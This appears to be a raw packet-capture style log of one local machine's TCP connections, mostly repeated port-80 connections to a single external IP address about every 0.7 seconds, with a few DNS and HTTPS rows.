Sep 6, 2024 09:59:25.698570013 CEST	49909	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:25.701579094 CEST	49909	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:25.701869011 CEST	49910	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:25.706792116 CEST	80	49910	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:25.706892014 CEST	49910	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:25.707020044 CEST	49910	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:25.707051992 CEST	80	49909	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:25.707118988 CEST	49909	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:25.711945057 CEST	80	49910	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:26.411360025 CEST	80	49910	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:26.411523104 CEST	49910	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:26.534143925 CEST	49910	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:26.534425020 CEST	49911	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:26.539263010 CEST	80	49911	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:26.539355993 CEST	49911	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:26.539645910 CEST	49911	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:26.540144920 CEST	80	49910	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:26.542526007 CEST	49910	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:26.544470072 CEST	80	49911	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:27.242930889 CEST	80	49911	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:27.243221045 CEST	49911	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:27.246797085 CEST	49911	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:27.247087955 CEST	49912	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:27.252264023 CEST	80	49912	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:27.252367973 CEST	49912	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:27.252513885 CEST	80	49911	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:27.252784014 CEST	49911	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:27.253194094 CEST	49912	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:27.258001089 CEST	80	49912	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:27.771945000 CEST	49844	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:59:27.776849031 CEST	80	49844	34.107.221.82	192.168.2.7
Sep 6, 2024 09:59:27.876221895 CEST	49849	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:59:27.881172895 CEST	80	49849	34.107.221.82	192.168.2.7
Sep 6, 2024 09:59:27.953917980 CEST	80	49912	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:27.955805063 CEST	49912	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:28.060242891 CEST	49912	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:28.060525894 CEST	49913	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:28.065655947 CEST	80	49912	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:28.065752983 CEST	49912	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:28.065762997 CEST	80	49913	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:28.066018105 CEST	49913	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:28.066276073 CEST	49913	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:28.071213961 CEST	80	49913	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:28.795059919 CEST	80	49913	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:28.795140028 CEST	49913	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:28.799132109 CEST	49913	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:28.799421072 CEST	49914	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:28.804641008 CEST	80	49913	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:28.804748058 CEST	49913	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:28.805031061 CEST	80	49914	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:28.805114031 CEST	49914	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:28.805351019 CEST	49914	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:28.810714960 CEST	80	49914	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:29.510785103 CEST	80	49914	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:29.510895014 CEST	49914	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:29.621143103 CEST	49914	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:29.621484041 CEST	49915	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:29.626390934 CEST	80	49914	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:29.626507044 CEST	49914	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:29.626650095 CEST	80	49915	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:29.626748085 CEST	49915	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:29.626980066 CEST	49915	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:29.631753922 CEST	80	49915	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:30.321928024 CEST	80	49915	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:30.322024107 CEST	49915	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:30.325382948 CEST	49915	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:30.325696945 CEST	49916	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:30.330445051 CEST	80	49915	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:30.330543041 CEST	49915	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:30.330761909 CEST	80	49916	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:30.330892086 CEST	49916	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:30.331011057 CEST	49916	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:30.336044073 CEST	80	49916	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:31.051662922 CEST	80	49916	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:31.053862095 CEST	49916	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:31.167001963 CEST	49916	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:31.167294025 CEST	49917	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:31.172149897 CEST	80	49916	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:31.172440052 CEST	80	49917	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:31.176104069 CEST	49916	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:31.176137924 CEST	49917	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:31.176897049 CEST	49917	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:31.181621075 CEST	80	49917	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:31.879453897 CEST	80	49917	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:31.879884958 CEST	49917	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:31.884291887 CEST	49917	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:31.884579897 CEST	49918	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:31.889612913 CEST	80	49918	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:31.889744043 CEST	80	49917	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:31.889868975 CEST	49917	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:31.889884949 CEST	49918	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:31.890216112 CEST	49918	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:31.895231962 CEST	80	49918	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:32.626110077 CEST	80	49918	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:32.627156973 CEST	49918	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:32.749335051 CEST	49918	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:32.749629021 CEST	49919	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:32.754426003 CEST	80	49919	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:32.754669905 CEST	49919	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:32.754684925 CEST	80	49918	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:32.754766941 CEST	49918	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:32.755032063 CEST	49919	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:32.759771109 CEST	80	49919	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:33.473628044 CEST	80	49919	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:33.473905087 CEST	49919	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:33.478472948 CEST	49919	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:33.478775978 CEST	49920	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:33.483496904 CEST	80	49919	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:33.483531952 CEST	80	49920	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:33.483612061 CEST	49919	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:33.483680010 CEST	49920	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:33.483797073 CEST	49920	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:33.488564968 CEST	80	49920	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:34.208023071 CEST	80	49920	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:34.208575964 CEST	49920	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:34.317524910 CEST	49920	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:34.317970991 CEST	49921	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:34.322659969 CEST	80	49920	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:34.322818041 CEST	80	49921	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:34.322824955 CEST	49920	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:34.322932005 CEST	49921	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:34.323436975 CEST	49921	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:34.328172922 CEST	80	49921	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:35.026388884 CEST	80	49921	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:35.026539087 CEST	49921	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:35.029517889 CEST	49921	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:35.029824018 CEST	49922	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:35.034776926 CEST	80	49921	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:35.034790993 CEST	80	49922	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:35.034867048 CEST	49921	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:35.034899950 CEST	49922	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:35.035401106 CEST	49922	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:35.040178061 CEST	80	49922	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:35.734221935 CEST	80	49922	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:35.735615969 CEST	49922	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:35.847835064 CEST	49922	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:35.848110914 CEST	49923	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:35.852972984 CEST	80	49922	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:35.852982998 CEST	80	49923	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:35.853065014 CEST	49922	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:35.853077888 CEST	49923	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:35.853379011 CEST	49923	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:35.858122110 CEST	80	49923	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:37.113984108 CEST	80	49923	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:37.114006042 CEST	80	49923	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:37.114073038 CEST	80	49923	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:37.114330053 CEST	49923	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:37.114330053 CEST	49923	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:37.118091106 CEST	49924	443	192.168.2.7	34.107.243.93
Sep 6, 2024 09:59:37.118135929 CEST	443	49924	34.107.243.93	192.168.2.7
Sep 6, 2024 09:59:37.118747950 CEST	49924	443	192.168.2.7	34.107.243.93
Sep 6, 2024 09:59:37.120285988 CEST	49924	443	192.168.2.7	34.107.243.93
Sep 6, 2024 09:59:37.120316982 CEST	443	49924	34.107.243.93	192.168.2.7
Sep 6, 2024 09:59:37.121124029 CEST	49923	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:37.121422052 CEST	49925	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:37.126225948 CEST	80	49925	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:37.126329899 CEST	49925	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:37.126372099 CEST	80	49923	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:37.126605034 CEST	49925	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:37.126655102 CEST	49923	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:37.131316900 CEST	80	49925	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:37.594510078 CEST	443	49924	34.107.243.93	192.168.2.7
Sep 6, 2024 09:59:37.594641924 CEST	49924	443	192.168.2.7	34.107.243.93
Sep 6, 2024 09:59:37.599392891 CEST	49924	443	192.168.2.7	34.107.243.93
Sep 6, 2024 09:59:37.599405050 CEST	443	49924	34.107.243.93	192.168.2.7
Sep 6, 2024 09:59:37.599495888 CEST	49924	443	192.168.2.7	34.107.243.93
Sep 6, 2024 09:59:37.599579096 CEST	443	49924	34.107.243.93	192.168.2.7
Sep 6, 2024 09:59:37.599817038 CEST	49924	443	192.168.2.7	34.107.243.93
Sep 6, 2024 09:59:37.602473974 CEST	49844	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:59:37.607320070 CEST	80	49844	34.107.221.82	192.168.2.7
Sep 6, 2024 09:59:37.696945906 CEST	80	49844	34.107.221.82	192.168.2.7
Sep 6, 2024 09:59:37.700900078 CEST	49849	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:59:37.705696106 CEST	80	49849	34.107.221.82	192.168.2.7
Sep 6, 2024 09:59:37.772181988 CEST	49844	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:59:37.795656919 CEST	80	49849	34.107.221.82	192.168.2.7
Sep 6, 2024 09:59:37.833369970 CEST	80	49925	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:37.833472013 CEST	49925	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:37.872944117 CEST	49849	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:59:37.881014109 CEST	51311	53	192.168.2.7	1.1.1.1
Sep 6, 2024 09:59:37.885885954 CEST	53	51311	1.1.1.1	192.168.2.7
Sep 6, 2024 09:59:37.886079073 CEST	51311	53	192.168.2.7	1.1.1.1
Sep 6, 2024 09:59:37.890887976 CEST	53	51311	1.1.1.1	192.168.2.7
Sep 6, 2024 09:59:37.957103968 CEST	49925	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:37.957377911 CEST	51312	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:37.962408066 CEST	80	51312	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:37.962455034 CEST	80	49925	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:37.962555885 CEST	49925	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:37.962575912 CEST	51312	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:37.962702990 CEST	51312	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:37.967446089 CEST	80	51312	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:38.336232901 CEST	51311	53	192.168.2.7	1.1.1.1
Sep 6, 2024 09:59:38.341831923 CEST	53	51311	1.1.1.1	192.168.2.7
Sep 6, 2024 09:59:38.342173100 CEST	51311	53	192.168.2.7	1.1.1.1
Sep 6, 2024 09:59:38.656450987 CEST	80	51312	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:38.656573057 CEST	51312	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:38.659564018 CEST	51312	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:38.659878969 CEST	51314	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:38.666624069 CEST	80	51314	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:38.666667938 CEST	80	51312	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:38.666745901 CEST	51312	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:38.666760921 CEST	51314	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:38.667027950 CEST	51314	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:38.672802925 CEST	80	51314	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:39.369755030 CEST	80	51314	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:39.370023012 CEST	51314	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:39.486253977 CEST	51314	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:39.486525059 CEST	51315	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:39.491532087 CEST	80	51314	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:39.491615057 CEST	51314	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:39.491674900 CEST	80	51315	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:39.492580891 CEST	51315	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:39.492846012 CEST	51315	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:39.497682095 CEST	80	51315	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:40.185518980 CEST	80	51315	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:40.188206911 CEST	51315	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:40.189237118 CEST	51315	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:40.189583063 CEST	51316	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:40.194308043 CEST	80	51315	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:40.194344044 CEST	80	51316	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:40.194449902 CEST	51315	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:40.194480896 CEST	51316	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:40.194885015 CEST	51316	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:40.199651957 CEST	80	51316	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:40.920136929 CEST	80	51316	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:40.920311928 CEST	51316	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:41.040839911 CEST	51316	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:41.041157961 CEST	51317	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:41.045998096 CEST	80	51316	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:41.046036959 CEST	80	51317	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:41.046149015 CEST	51317	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:41.046149015 CEST	51316	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:41.046272993 CEST	51317	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:41.050988913 CEST	80	51317	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:41.746063948 CEST	80	51317	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:41.746161938 CEST	51317	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:41.749146938 CEST	51317	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:41.749453068 CEST	51318	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:41.754308939 CEST	80	51318	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:41.754323959 CEST	80	51317	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:41.754405975 CEST	51317	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:41.754417896 CEST	51318	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:41.754555941 CEST	51318	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:41.759314060 CEST	80	51318	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:42.477236986 CEST	80	51318	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:42.477338076 CEST	51318	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:42.597831964 CEST	51318	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:42.598114967 CEST	51319	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:42.602900982 CEST	80	51319	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:42.602997065 CEST	51319	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:42.603005886 CEST	80	51318	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:42.603070974 CEST	51318	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:42.603358030 CEST	51319	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:42.608102083 CEST	80	51319	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:43.306701899 CEST	80	51319	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:43.306794882 CEST	51319	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:43.309839964 CEST	51319	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:43.310126066 CEST	51320	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:43.315224886 CEST	80	51319	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:43.315242052 CEST	80	51320	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:43.315428972 CEST	51319	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:43.315469027 CEST	51320	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:43.315757036 CEST	51320	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:43.320542097 CEST	80	51320	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:44.023732901 CEST	80	51320	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:44.023832083 CEST	51320	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:44.142060041 CEST	51320	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:44.142343044 CEST	51321	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:44.147089958 CEST	80	51320	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:44.147109985 CEST	80	51321	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:44.147195101 CEST	51320	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:44.147243023 CEST	51321	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:44.147475004 CEST	51321	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:44.152247906 CEST	80	51321	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:44.869127989 CEST	80	51321	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:44.869225025 CEST	51321	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:44.872276068 CEST	51321	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:44.872824907 CEST	51322	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:44.877283096 CEST	80	51321	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:44.877372026 CEST	51321	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:44.877557039 CEST	80	51322	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:44.877641916 CEST	51322	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:44.877931118 CEST	51322	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:44.882642031 CEST	80	51322	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:45.573246956 CEST	80	51322	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:45.573580027 CEST	51322	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:45.682281971 CEST	51322	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:45.682602882 CEST	51323	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:45.687350988 CEST	80	51322	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:45.687374115 CEST	80	51323	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:45.687448978 CEST	51322	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:45.687486887 CEST	51323	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:45.687777042 CEST	51323	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:45.692563057 CEST	80	51323	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:46.385834932 CEST	80	51323	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:46.387711048 CEST	51323	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:46.390906096 CEST	51323	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:46.391238928 CEST	51324	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:46.397425890 CEST	80	51324	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:46.397607088 CEST	80	51323	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:46.397710085 CEST	51323	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:46.397723913 CEST	51324	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:46.398001909 CEST	51324	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:46.402769089 CEST	80	51324	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:47.097655058 CEST	80	51324	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:47.097755909 CEST	51324	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:47.204265118 CEST	51324	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:47.204607964 CEST	51325	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:47.209469080 CEST	80	51324	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:47.209654093 CEST	51324	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:47.209887981 CEST	80	51325	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:47.210011005 CEST	51325	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:47.210247040 CEST	51325	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:47.215049028 CEST	80	51325	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:47.765019894 CEST	49844	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:59:47.769993067 CEST	80	49844	34.107.221.82	192.168.2.7
Sep 6, 2024 09:59:47.865720034 CEST	49849	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:59:47.870781898 CEST	80	49849	34.107.221.82	192.168.2.7
Sep 6, 2024 09:59:47.918157101 CEST	80	51325	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:47.918255091 CEST	51325	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:47.921509027 CEST	51325	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:47.921801090 CEST	51326	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:47.927721977 CEST	80	51326	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:47.928147078 CEST	51326	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:47.928378105 CEST	51326	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:47.928440094 CEST	80	51325	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:47.928539038 CEST	51325	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:47.933271885 CEST	80	51326	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:48.632009029 CEST	80	51326	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:48.632138968 CEST	51326	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:48.751168013 CEST	51326	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:48.751538038 CEST	51327	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:48.756381035 CEST	80	51326	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:48.756660938 CEST	51326	80	192.168.2.7	31.41.244.10
